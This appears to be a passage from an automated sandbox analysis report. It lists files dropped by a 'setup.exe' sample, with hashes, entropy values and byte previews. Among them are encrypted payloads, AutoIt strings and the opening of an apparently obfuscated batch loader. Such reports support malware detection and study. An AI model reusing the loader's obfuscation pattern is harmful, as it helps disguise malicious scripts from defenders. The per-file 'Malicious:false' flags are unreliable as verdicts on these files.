                                      SHA-512:02271F91DEEC06ACF9609125B4B62CDCCD12E4233D39C47233E33557427109549D2645809ED9161A3946834504AF9AC11E9F8AA1D2C2D989B9BC39E27392FEBA
                                      Malicious:false
                                      Preview:7.T%ZHF....X`g.bn).A!..@...nD...$.)...W>y_U.+O.....u..>..uM..%..3.=.S..|..0k._I.NC...i.. .p....0s4.$]..P%..T.X...|.sW.u..R.W...&....D$.L.|.vU...Z.-.6.g.Q...W8]&.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....2.G.'.F...h..............s....D.s....DkC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..q.W..,P..Myn.2..t.W....b2..8...2/dk.s..Z..D.s....Dm......=.r8.5...x..2).U.j.....>.,#...w.L.)......=.=.k..=N ..{..?.....$....a..9 ..F/.._..@.Y.L..l.`.+g......u.s r.....6.F...).....A.P.w.\..2.bto...(..};.dN.p@.I....n...3.....L..4.C.;v..._Z.d]Y~..?.x|,.3.J0.....k9.7...^.M.x.@..&l..m..dlv..._RR..e+...y.q....MX..\..q...r..%b^..hs+.x../-.2.8..:...B..3.b.....*.......vi].C.``..I.F=n...b.
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):120832
                                      Entropy (8bit):4.977651511379863
                                      Encrypted:false
                                      SSDEEP:768:Vc/mex/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R:ePdKaj6iTcPAsAhxjgarB
                                      MD5:E00C2E4747E1DBE85F4EF7AC364713D2
                                      SHA1:B1FAA76A14A9AB5B0B4DE38BFB342AF32A67C520
                                      SHA-256:599BC7DE6330DED6D1DC02745BD0F1F1EE47C94B9916C77EAA7A6CCF716E4B56
                                      SHA-512:5216F4D623BB24149D761333E5DB0522B65531DF807C4B2AA30FE3B90DBFD67A664DA392EFE53CA289CE8DE88686359514F857F248AC8C4E604AB19602630F99
                                      Malicious:false
                                      Preview:............................... !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~..................................................................................................................................>......................................~...~..................................................................................................................................................................................................................................x.......................................................................................................................................................................................................................................................................................................................b........\... ... |....................................................................L...........I..............................................................
                                      Process:C:\Users\user\Desktop\setup.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):86016
                                      Entropy (8bit):7.998113629509524
                                      Encrypted:true
                                      SSDEEP:1536:La+QqWrboc69uaIR/8vQ1HhIt3+rm/xSWBIrjHdcA2fgrffns3ATtO4v2sBXWD8n:LavnYuT2qhI8hWmfWAeaffns3A5v2sBT
                                      MD5:70749708F82F6478C9447EAA6424E676
                                      SHA1:893782A94DBFE80E69ACD8E566ED01BC9BA4DA2D
                                      SHA-256:9109513040827DAF8261AB6D67673E5FA1EC7261CD18CD93BB94EC7BC10CCAED
                                      SHA-512:624D217DA8850EBAAA592791310699DFBE52A1733266EA389A908C3E1C697F8947D336E07B834DDCE58AAC4690B3832ED9504EA4C595C3B34DDCA47E2BF2B852
                                      Malicious:false
                                      Preview:c....v.Kuf]z.....1.....7.l...q.S.v%.l..n.L....,.9.(.jC.....D...O.nJ.f.i0.0[E.~...Ea<X.>.r4.P.....]..h%..o@.j.oL_b<v.c....2...4...$[....$..z...*ls`.N.L..^.a.....%z.s.$^...Z...4~......H...6..b........V*.7&.A..........3\..]..A)...}1.(..NA...y~..Wt...0.a[......$G...z.....mi.#Wyk.........!.Uf....e1.43"....?...........Yf9)..[n;4|s....7mT^gpw_...B..k..S....q...j.L%.JGHU..{sy}-e......'W..T|=."taGi..l.,... w.5A......Mj.....3fO.P...Gm.=............#...M..l.4.{..xNr.#@.@.n6.H.... ....;.XV.z.D..{........6.........t..S.^7._9h..-..o.\,fB.8.L..x.. |...4.#.2w..l.?.....v...?.M.C.....{.g..P.....ys....K.....l..0.5.P.S.i.W.Lb....u.l.U5.....e_..l.:&...RU.B..^.!../.`..-..^..J..z.....3mn.v.D[i.<.,...;I.......8|...7'U1TJ..V........l...P.n?9.........tO!#..=[....B.=.}&.p..GE.V2..3.nF...G.9r..}Y..+R'b......2...L..e..b..0.}c.=....9...l6.i'k.G..;...mCt'.PI.r..1....v.:.&N.^..'f]K.....(,.S...rjH.;.-...x[f4.C.....j.<..wz...o.Z...{B.....5`..w.=....'...zSN...\1+.F...,.
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):95232
                                      Entropy (8bit):6.601424826120088
                                      Encrypted:false
                                      SSDEEP:1536:mCMIBZwneAJu7QnswIPumV3BxZxu6/sPYcSyRXzW8/uC6LdTmHwANUQlHS3cctlt:dtCZEMnVIPPBxT/sZydTmRxlHS3NxrHv
                                      MD5:DC66D0464185B03BFE2A8260383C81C9
                                      SHA1:DF7E225A3854EC88CD70637B2E6855F77DCBCD0D
                                      SHA-256:7A98FB9CF35EFA46A9F79D2427E487DD3265B9A123FE4E35E840FF8ADB439163
                                      SHA-512:D4B4AB5EF3FFE765E960FC42FCBA2B0F952D62AF59BB0232B4E0CC5664584389A3F2269081737F241EF426FE264BDA50B09EE76815E56B3BFDA942DA4D856199
                                      Malicious:false
                                      Preview:F.].....t...T$..C......3...@...x...H.t..I8.A......x...H.t..I8.A...E(...M..B.......|.......F...3...Pj.S........D$.....;........D$,PW.L$`..&...D$,P.L$L......t$..D$Lj.PS.1.......L$H.es...D$.G;.r.....j..D$.P.L$`.\'......u..T$....@...x...H...5....-....M.....W..j.S........3...~<.D$,PV.L$`.X&...D$,P.L$L....Vj..D$PPS........L$H..r..F;.|.T$..D$.@j.P...H.........'........}$.........$...A....D$x...A..A..q$..;.u..V..$...$.........$....$........&...D$..D$.j.P.L$`.$.........P&...t$t...T$..R$..j.j..L$4.s9...D$8.D$..%...............D$...$.........%..j.j..L$4.:9...D$8.D$..;%...T$....@...x...H.t..I8.A......x...H.t..I8.A....%........&...$......I..$.........$.........$.........D$...I..D$ .....D$$.....D$(.....D$H.....D$P.....D$T....j...$....P.D$.P.L$d..$....t+..$.....t..$....P.L$L......D$HP.L$ .T....|$$..u0.T$....@...x...H.t..I8.A......x...H.t..I8.A...4.M..$...W..j.S.w......3...t..D$ Vj..4.S.N...F...;.r.L$H.}p...L$..D$...I.......t$ .G.......$......I...$..........$.....$....U..
                                      Process:C:\Users\user\Desktop\setup.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):66560
                                      Entropy (8bit):7.997373986972398
                                      Encrypted:true
                                      SSDEEP:1536:KL9+7xsQUYkY3K72EMzucnMODb/6fzeAj7YvxRbQwiobuLJW2Va:cLp2EMzlDeqAXA8obEW2Va
                                      MD5:A28E0FD0589CF3EE47720C0C92BADF5D
                                      SHA1:AEE3105D5C4B9B0027CE9A28EF2BFA00478107FB
                                      SHA-256:428F17428E1D81642AF3EA662667D3DE1813B92DA57FD9F1DA8A5F0B1B86A2CE
                                      SHA-512:140D6D0445E611676FCDF0EF24AD6BD7FFD14B5A2A8F5D8AAF617AFEFCAC48FD5F2BB07012DB641F24C71E0D871D8278325C3E5D3738520BB4C652EDEE0053C5
                                      Malicious:false
                                      Preview: .][[{A..H.D.A9......Y..."e...r..f.H.m]-u.|oF..r.%a.....::....C..p...........-...w$..m.......W.4(i.S.h4.!d...Enn}...9..^.h~.U..u.}S./.yU......*........W.5,0....q...E@...%?.....X..e.*..Y.....y....j(V;&.....a..o...Gm(.J.m >...dFo....k..fg&...@......Ru%*.K.y5.Z.R.g.......G..T.9....5.....b....GR&4B.)C./..7.0:... ...H...9.w>ma+... .7>..,%..\t...S....x.t.3.&.......9..&....Q$..,.J.`u.]...7.6.&.0R.u{=..K.R...?...FI..y.3...w..+<._Y8...k..t..)..jjT./.N....Y%(.h.r@$..x.q..k...J.2.2+#3.d...,..>..as....E..h.R..3C..A..3X...*o.G(../...t..}c.U r..T.Y....|...?.v.`.Y...,c2.I..^P.>.c,...+..o.o+.'.....J....2x9H..Q..S.......VU..W.F.j9`..j.9..D.:..XQ......\;Y.Q.E..q.:3X.o..c....B..R..#.{.c<.u.x}\.U?2..../X.y......my%..UF..i..f9h.oG....X.Z...R...=...Db........c9...'.Luu-......|.s...t....I.....j.E7...w$0.6.....6.x:.Z."....].+....w....l.T....]...&....u//.7.M.Y.Z...0..=...o...u..v.u.z.....m?h...?.MF'~.....}.u.@0f.<..z...x.. ...Y.V..."n....n.....x..s.`../.4...#...[.
                                      Process:C:\Users\user\Desktop\setup.exe
                                      File Type:ASCII text, with very long lines (684), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):14104
                                      Entropy (8bit):5.141266308965311
                                      Encrypted:false
                                      SSDEEP:384:kBc53vyipJazsPe6JrGSlc2H09jLy/YtiKlow3lk:kaJvvpJazsFGSlc26iYtnlox
                                      MD5:3920A54C66B165ED2257B65941318CC5
                                      SHA1:C55E948965FE55152671F152638B190FEE98C83A
                                      SHA-256:6C8B78C5EBBD2D83F157A0D05BEEA1ECBC293A6F272768AAA35B9DFABC99E610
                                      SHA-512:0473C5E86C165C7F16A254F62930A12DED3E2F17D80F76CED33FD3475696D739C2B10077E5F076B4433DFE8CF237D39E5B667A6A798E13F2A1DC23DF79D225F4
                                      Malicious:false
                                      Preview:Set Numerical=c..VpvEz-Nose-Integration-Nh-Knew-Cocks-..GMOEBay-Hill-Compound-Recordings-..iiRHash-Antibody-Dna-..raAccordingly-Bidding-Participating-Leisure-Tomato-Clicks-Hoped-..ucSSCustoms-Changed-Measurement-Ieee-Affiliates-Wow-..auwONhl-..VDpHttp-Smoke-Agenda-Oakland-Per-..rAXp-Demonstrate-Newer-Vulnerability-Duty-Ecommerce-Cu-Anyone-Disable-..RrrFemale-Swimming-Bacterial-Supplies-Intelligent-..QAUser-Theorem-Hose-Airports-..Set Greene=R..FwkwFort-..NWZdMini-Peru-Matter-Meters-Surveillance-Possible-Shakespeare-Stuffed-Camera-..TujPart-Any-Dosage-Hazard-Husband-Europe-Sox-Sheer-..dVTrack-Horse-Hosts-Will-Netscape-..laZrSafely-Stationery-Du-..wFZBlog-Settle-..LQLucia-Medicare-Zoom-Camera-Revenues-..jHsGear-Howard-Channel-Algorithm-Conflicts-Trails-Switch-..EMmDSenators-Server-..yoRegularly-Rd-Pst-Oc-Lafayette-Attractive-Carry-Conventions-..Set Interfaces=Q..RznwBrazil-Norwegian-Foot-..ewShirts-Medicines-Dsc-Newly-Clicking-Harley-Enemies-..vaYVWrite-Seeker-Fence-Bl-Amendment-Hazardou
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:ASCII text, with very long lines (684), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):14104
                                      Entropy (8bit):5.141266308965311
                                      Encrypted:false
                                      SSDEEP:384:kBc53vyipJazsPe6JrGSlc2H09jLy/YtiKlow3lk:kaJvvpJazsFGSlc26iYtnlox
                                      MD5:3920A54C66B165ED2257B65941318CC5
                                      SHA1:C55E948965FE55152671F152638B190FEE98C83A
                                      SHA-256:6C8B78C5EBBD2D83F157A0D05BEEA1ECBC293A6F272768AAA35B9DFABC99E610
                                      SHA-512:0473C5E86C165C7F16A254F62930A12DED3E2F17D80F76CED33FD3475696D739C2B10077E5F076B4433DFE8CF237D39E5B667A6A798E13F2A1DC23DF79D225F4
                                      Malicious:false
                                      Preview:Set Numerical=c..VpvEz-Nose-Integration-Nh-Knew-Cocks-..GMOEBay-Hill-Compound-Recordings-..iiRHash-Antibody-Dna-..raAccordingly-Bidding-Participating-Leisure-Tomato-Clicks-Hoped-..ucSSCustoms-Changed-Measurement-Ieee-Affiliates-Wow-..auwONhl-..VDpHttp-Smoke-Agenda-Oakland-Per-..rAXp-Demonstrate-Newer-Vulnerability-Duty-Ecommerce-Cu-Anyone-Disable-..RrrFemale-Swimming-Bacterial-Supplies-Intelligent-..QAUser-Theorem-Hose-Airports-..Set Greene=R..FwkwFort-..NWZdMini-Peru-Matter-Meters-Surveillance-Possible-Shakespeare-Stuffed-Camera-..TujPart-Any-Dosage-Hazard-Husband-Europe-Sox-Sheer-..dVTrack-Horse-Hosts-Will-Netscape-..laZrSafely-Stationery-Du-..wFZBlog-Settle-..LQLucia-Medicare-Zoom-Camera-Revenues-..jHsGear-Howard-Channel-Algorithm-Conflicts-Trails-Switch-..EMmDSenators-Server-..yoRegularly-Rd-Pst-Oc-Lafayette-Attractive-Carry-Conventions-..Set Interfaces=Q..RznwBrazil-Norwegian-Foot-..ewShirts-Medicines-Dsc-Newly-Clicking-Harley-Enemies-..vaYVWrite-Seeker-Fence-Bl-Amendment-Hazardou
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):123904
                                      Entropy (8bit):6.585035876941469
                                      Encrypted:false
                                      SSDEEP:3072:sBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfj:sjphfhnvO5bLezWWt/Dd314V14ZgP04
                                      MD5:CF91C73A94C610C69B320295C8DAD484
                                      SHA1:072EEA695B66B844368162FA6B364303B8225CEF
                                      SHA-256:B2C059189C73B2238D6541D5CD374AB26D76C37DE816C35B273B1075ED96CACC
                                      SHA-512:358C2473EF23865C84A21487B949BABFA9BEF3BF5D5DDE3355316282A27BC70E1119CF2874543C64295975CF46271290B16163D073B2DD612892FFA636A3A2C8
                                      Malicious:false
                                      Preview:..I..L$(......#...j..........j.....I...........W....I..........L$.....3.PPj.W.D$.....I.H..~A.\$...h.....D$<PSW....I..D$8P.L$..wt..j..L$..0...C;.|.t$$.\$..].h.....D$<P.t$.W....I..D$8P.L$..9t...D$...P....W....I...j.j..H.........L$..)....E....I....Q...Z..J...t...t..I8.A.........t..I8.A......z...B.t..@8.@......I._^3.[..]...U..E.SVW.@....0.......^..C...u..5.#M.....I.....I........E....Pj.....I.....uE.u........&..F........H..|9...D9.t..@8.@......|9...D9.t..@8.@......V....I...u0.u....1....&..F........H..|9...D9.t..@8.@.......3P.VT..YYV....I..5.#M.....I.....I.Vj.....I...u;.u.........&.3.B.V....H..|9...D9.t..@8.P..|9...D9.t..@8.@......I._^3.[]...U..E.VWj..@..0.~............u...Y...g....>3._.F.....^]...U..QQVWh..... ...YP.M...H...}.3.f...E..@..0...D....F.h....W.0....I..M..E.P.v....E..(.u.j.P....W........_3.^....U..S.].VW.{...s.r..v........F..8.C..0......W...6......j..F..0....I..u..........>3._.F.....^[]...U..QW.E...Ph....j.h.~L.j.j.h......X.I...u=V.u....M....&.3.B.V...^.H..|9...D
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):79872
                                      Entropy (8bit):5.8568364629581415
                                      Encrypted:false
                                      SSDEEP:1536:5VGHj1vtK7h6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwu9:/q8QLeAg0Fuz08XvBNbjaAt9
                                      MD5:790CAB68480DA239A8340E419E741DC4
                                      SHA1:6A452363588EF0C76C6CD0AA06DED84081E6473D
                                      SHA-256:AA9048B39A86F5740B0C67AF9015B4338E5E30B3260661267A24B13F72B27E3D
                                      SHA-512:8174D075C5B9FCB1D7591937DA3147947835E11C656193FFB36013FE3463AFD38CAD5F9FF91864640510FDC8CDE9F8DFD1A47E5A8F652179EBFB1443DCD30D83
                                      Malicious:false
                                      Preview:.X.I.T.R.E.G.I.S.T.E.R.....G.U.I.C.T.R.L.C.R.E.A.T.E.T.A.B.I.T.E.M.....G.U.I.C.T.R.L.S.E.T.D.E.F.B.K.C.O.L.O.R.....I.N.I.R.E.A.D.S.E.C.T.I.O.N.N.A.M.E.S...G.U.I.C.T.R.L.C.R.E.A.T.E.B.U.T.T.O.N...D.L.L.C.A.L.L.B.A.C.K.R.E.G.I.S.T.E.R...G.U.I.C.T.R.L.C.R.E.A.T.E.U.P.D.O.W.N...G.U.I.C.T.R.L.C.R.E.A.T.E.S.L.I.D.E.R...S.T.R.I.N.G.R.E.G.E.X.P.R.E.P.L.A.C.E...O.B.J.C.R.E.A.T.E.I.N.T.E.R.F.A.C.E.....G.U.I.C.T.R.L.S.E.N.D.T.O.D.U.M.M.Y.....F.I.L.E.C.R.E.A.T.E.S.H.O.R.T.C.U.T.....G.U.I.C.T.R.L.C.R.E.A.T.E.I.N.P.U.T.....S.O.U.N.D.S.E.T.W.A.V.E.V.O.L.U.M.E.....F.I.L.E.C.R.E.A.T.E.N.T.F.S.L.I.N.K.....G.U.I.S.E.T.A.C.C.E.L.E.R.A.T.O.R.S.....G.U.I.C.T.R.L.C.R.E.A.T.E.C.O.M.B.O.....G.U.I.C.T.R.L.S.E.T.D.E.F.C.O.L.O.R.....P.R.O.C.E.S.S.S.E.T.P.R.I.O.R.I.T.Y.....G.U.I.C.T.R.L.S.E.T.R.E.S.I.Z.I.N.G.....S.T.R.I.N.G.T.O.A.S.C.I.I.A.R.R.A.Y.....D.R.I.V.E.G.E.T.F.I.L.E.S.Y.S.T.E.M.....G.U.I.C.T.R.L.C.R.E.A.T.E.D.U.M.M.Y.....T.R.A.Y.I.T.E.M.S.E.T.O.N.E.V.E.N.T.....G.U.I.C.T.R.L.C.R.E.A.T.E.R.A.D.I.O.....W.I.N
                                      Process:C:\Users\user\Desktop\setup.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):66560
                                      Entropy (8bit):7.996878369279497
                                      Encrypted:true
                                      SSDEEP:1536:N8pqsRtX4EHoqNLeUDtUgnQ+e40aVNYB/T:N8pzR8CDVd0aVNQ
                                      MD5:0183DBFF21A2CBF2EF2051F92FB261EA
                                      SHA1:6311B1D7D18D9196BCA94175BED8BF00421E1D02
                                      SHA-256:4155AEBE1D5968E2F2BF007DDB715BCA2D3CEC57C641E57A7D7406E767F76F60
                                      SHA-512:6E2B8E075B491387F80E4EED11AA43D9FD6735EA7FF9599D61F98108630253FE81A0255547148D85A5F733987F257E23666291BF56F72D6BAA5BA939ADDA5016
                                      Malicious:false
                                      Preview:h..0...4..:......ZH.|Jigc...r]V.j........D..s..=....UV.We.L..#.`o.?.-E:..abl.Y...g..k..C..}.....S...F....h..PWt.M05<.p.q.!.?QZ......R..,n.7'W..j.L"G..=..7"..g.......n...@.Y...M.FK...Gv..W..n.H.."M..B....B..5%.X.=.W.L...Bo..g..\....^..6.G....4..Y....+.At...C..e*.......;......f6nh.....U..M0..9.ih^p....B.....<7....<1.w.D]$.f..u.b,H[)..E..o.-3....7f............N..a/.....GQ..[y.F........[g@..R.......b....c8..[{.@...d..J..TC....v.v0RPA..r.zBM....y*..c......D.....|.....2a.M...6q...N....B~.........M).f.....!.;].....'s..D!.-..Ud..b......f..<.A...J..n-.?"..M...M9..h.*r..T./.....\..X.gIC.Y.(:#)N...*{...x.68..X.....h....v..3.....0...(.e.[}........)....$Vx..k.P.@@+>...1F.".X$..B.......a../.bt.>......@.H...J.|........NG...in....C.. .r.$.Y..`.S...Gq.c...R82.fH.?....[.(...ls...PK=?/|...J.2...m.&.Y...#.....D......:.v.LQ..,..T....t.?f.S..A..).nl....J..e.....-$.<E..~...e.*.......s..I...83..j.....K...G!....Y..}...D.HD..........n......I!c.H..+..&.*....@..Cb
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):62464
                                      Entropy (8bit):6.549717665973685
                                      Encrypted:false
                                      SSDEEP:1536:L1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpV:LZg5PXPeiR6MKkjV
                                      MD5:34FC9DE0E1CA03EF501F44959FF2A326
                                      SHA1:C979CB07E3CD37B04287C171E5B2D627B6FB1571
                                      SHA-256:A68BB7207AAACD1B7FD4EE1AB4DAFC71BD464CF3386F7A1A4753391CE7A7C25C
                                      SHA-512:1E4B43A54AB2342BE65F2F9007FF45FFD0053477CBF5B04E259E73EEE7C4506828797DC559EACFB08499A3F90E1142F58AE1E05787341DF614B42A2513E7E6AB
                                      Malicious:false
                                      Preview:.F|U............[............u......3........................l.....p.....t.....x.....|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0.........F.;G.u{............8......../.....................VW......~d...(....~h...0....~D...8....~P...@....>.t..6..<.I..&..u........d)M..U.B.U.;..._....u... .........$.........@)M........t.Q.=.....@)M..... ..5.)M..E.N.5.)M.;.L)M.u...L)M....D)M.........._..^u..5.)M.j.....I..%.)M....D)M...t..@)M..D...8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):2519
                                      Entropy (8bit):7.557676395333429
                                      Encrypted:false
                                      SSDEEP:48:V4EC5+MV0Hhg5XKU+pp0OmyOO2UKxbQ0JYcmcY1BwPuKGPakfDb13g:V4EDzHy5Xz+ppo+zAbQ6YhbBwGKGP5hw
                                      MD5:27913DCE14BDD76823839E1BFBCA784F
                                      SHA1:02C2FD9AB4BFCDFC1B1429CCC3084CEFDF457164
                                      SHA-256:B58D374B43B871D5D309DD55B68E4DBE3373744DB8E11DA3EED17F80A972B240
                                      SHA-512:2F3DF0DBD99B8C191006E652713C7505A2211E7D081E2D65541F0651668BD0A6C18E4EC6459080C6885BE0A3211C0BE82F58DE546DC9D6CB7BE2648311C6560D
                                      Malicious:false
                                      Preview:n...QBD....8..NNZ.G..6Iw0.q7..!.u..a.?w.....l..Mt....9...^.........n....af.j..:e.Y..5...(....p....u..:......%....'YLv9[.........0....3H..md.,zXO.K.I.d.c.y=....X..BEyn...\T.e........o...gn........p.y.....'.7.2...c<(L.........&0.."0...U...........0...U.......0....0...U.......l..............gS.0...U.#..0.....K...E$.MP.c.......0>..+........2000...+.....0.."http://ocsp2.globalsign.com/rootr306..U.../0-0+.).'.%http://crl.globalsign.com/root-r3.crl0G..U. .@0>0<..U. .0402..+........&https://www.globalsign.com/repository/0...*.H.............I.^..Z.a*M.J.)........z.5...3.mr."NA?m......_...,..;...6Yy..t.....h...eYB..U9...&.q8..!...N.[`jC.}..`a...^N2..l.<....vji.....XO..2J.T.8.;..u....|%'.&..S....a52.....:..h.r..$<N.S<....5,..B)._`..Ba..Wj3B.51..>7+...$.N...G. .a...3.-....<..#...4.0.._0..G.............!XS..0...*.H........0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1.0...U....GlobalSign0...090318100000Z..290318100000Z0L1 0...U....GlobalSign Root CA - R31.0...U...
                                      Process:C:\Users\user\Desktop\setup.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):55296
                                      Entropy (8bit):7.997342472955196
                                      Encrypted:true
                                      SSDEEP:1536:f5ZmvfXHUGnSl9TzY4ffOUNP5ZLGLVhy0feGSVk1K+4ivg:vGtiY4ffOubGx40V1i
                                      MD5:121CAC13F89F021D263F4F9D1667492D
                                      SHA1:B5A5E2E45CDA0521C423B22FB2EE31C5E5970458
                                      SHA-256:56F941163F554FE29969F6D01BF3A1D1BCDFC995E8B502AA929F4796568E7761
                                      SHA-512:FC32C9355CCDA57C92A7013A1A0B8E56543C4BFA1B62AB7C3E7235DFA90C27A918B50C68025DA755AEE36186FD928119A76B1C019EE3E243D0820348056E6993
                                      Malicious:false
                                      Preview:7.T%ZHF....X`g.bn).A!..@...nD...$.)...W>y_U.+O.....u..>..uM..%..3.=.S..|..0k._I.NC...i.. .p....0s4.$]..P%..T.X...|.sW.u..R.W...&....D$.L.|.vU...Z.-.6.g.Q...W8]&.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....2.G.'.F...h..............s....D.s....DkC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..q.W..,P..Myn.2..t.W....b2..8...2/dk.s..Z..D.s....Dm......=.r8.5...x..2).U.j.....>.,#...w.L.)......=.=.k..=N ..{..?.....$....a..9 ..F/.._..@.Y.L..l.`.+g......u.s r.....6.F...).....A.P.w.\..2.bto...(..};.dN.p@.I....n...3.....L..4.C.;v..._Z.d]Y~..?.x|,.3.J0.....k9.7...^.M.x.@..&l..m..dlv..._RR..e+...y.q....MX..\..q...r..%b^..hs+.x../-.2.8..:...B..3.b.....*.......vi].C.``..I.F=n...b.
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):95232
                                      Entropy (8bit):6.675937966451431
                                      Encrypted:false
                                      SSDEEP:1536:WU0pkzUWBh2zGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDOc:WUDQWf05mjccBiqXvpgF4qv+32eOyKOv
                                      MD5:1566ECCF93E2CF411095AE7D38F9B538
                                      SHA1:D4D1B7AC1B4B797FE4F5BE148EDD67086B423CE5
                                      SHA-256:C85D1D34B1428742A37A9D5E70DA2C117DACC261C8C80B71C5CC9D024BD693A4
                                      SHA-512:955C339107F9B5C7DA04695B6A7541EADFA6A993D1556814E09D48B11E3BD2BA984D848A4CE2293CFBB724AB8D5EF022AF083B7E27920CC561DD0FEC2F3C90EA
                                      Malicious:false
                                      Preview:f;.......j.Yf;........M.....]....E..E..E...|....E..M...l....E.;}.........B..E..Ch...E..u..U.j.X...u..E.....].....E....},..}(.O<.G...H........8...;.........@...;.........+.E,.........+.;...........M,.U............P...;.v0.u...+...PRQ..[...U.....P...+.....M.4V.u..u..U...@.....t.j\Y;........}........;........}....}...u...j(X;...u...j*X;.......j+X;.......j?X;.......j{X;.........x...3...E..........E..@.........U.j?X;...J...........3.+.........$..`...............t|.....V.................>....M...u.....M.](.E..E..E..E..C +C....E..E....#E.M.....M...|....U.f..j.X..U......9O ............E..M....E..M...E..M....E..M............E..0.E,..t.+.@..........+...;...........E._^[...P....U..W............T...j?Xf9F.......j#Xf9F...............j*.u.X...f;........E......M.3..M(..E.j?.].A +A....E.X.}.f;...........u.j:Z.....;...........U..<...........v.....................j.[+.......j.[+...r...j*[+...3...3.j)...M.[.E..M.f;............f;.....t6.r....jiZ.u.f;.........B....E........j).]..[..f;
                                      Process:C:\Users\user\Desktop\setup.exe
                                      File Type:SysEx File -
                                      Category:dropped
                                      Size (bytes):95232
                                      Entropy (8bit):7.998019845217082
                                      Encrypted:true
                                      SSDEEP:1536:NpADrTdpietp2PbPlzFHEEkXQ+j39j2sILI2ZHBg2cHp5SnSczmypVinb8dU37Ys:8rTdpie6L9FHHqQkj2sILI2ZHBg2cHvP
                                      MD5:447B140C1F12CD49016AFE335C8C51C3
                                      SHA1:55A0BC8373C2DA82FB292C491C9B73D0BD253EA0
                                      SHA-256:C11A882371A911CB7432500F394AE8EC19E28755B9CD2C66446DF4AC61020292
                                      SHA-512:3FAC38C13F0CA17FE5AFBCCE5789E075706C4D1669AFF31CE78966661207052D12F7833AF51C1053B5CFAC5CDA6DD761133E442F78B18C50F69966B2A8038C3B
                                      Malicious:false
                                      Preview:.<..\1..#.m.I......> T...F.?."B.../.:..3K...fl.t\V.]..z.g .._'+mci.#.>.n.lAr.L.X..<.8....a........q........bl.W..E.gy....`p.t..:.)[....eR....rw...3..7O....K.....W...V.j.+.....C.6{.V2..LS.>..[yh...B.....<KK...W.....sA.}.O.].TS...../..z....L..0..{..T...}..#../...'.dA2)Q_...f F.H....1u..Qn.h...@.?...t:<.V.....[....a..fO.\.!%...m.}.. .. .H.o..{n.-d..O...m=eO{.q.@."7......C..|=.\...s....`f...4...!)C..X.:^...@...k.W.6..iLP..y..t..^..o/+?)._xiO6.#...9%T^.A=S..@...U...F. .eR...uBNL....`...S.'>.......kH..+.5..)q..:..<C.6. 6...j..c.....o.k..a.Z.zy?..|T...8...Jc.y...Qj.{.=l../;.gX.......IrJ...@...T.(.+g..h...D/.7..)....a=9...5......0...a...p.wu>.|..^Md.v........l}.0..KIQ../J....nl^.%2J[.........NLK.d..c.....]..1...?.f.E...0.e..z4.u....i......'._9.!.X.+....eJ.......... .iA.I.z..r..4..a.b...C.......,~z.C.b....y..!.[.}...=.;.a.0..+....Q.+...e+.Au..../..j.3....I.....e....h2J..Ru....{..m..,.......&...Xr._..<...`...+u....g...c......(.......w.]..E.
                                      Process:C:\Users\user\Desktop\setup.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):96256
                                      Entropy (8bit):7.998208168184681
                                      Encrypted:true
                                      SSDEEP:1536:wKURQgEFHKeEvxZFCcQCEtf6oYQqnv/2yiHJqUpeSH55uAXRh9J/LzKxH7yG6NMr:wKeQRFqvfF8/w3QCmnp5H5UAXRh9J/XM
                                      MD5:86E877927A1C9043A7F1AC211569C47F
                                      SHA1:DD4AD496D98B1804EF7C312D7D72FDD28A7A71F7
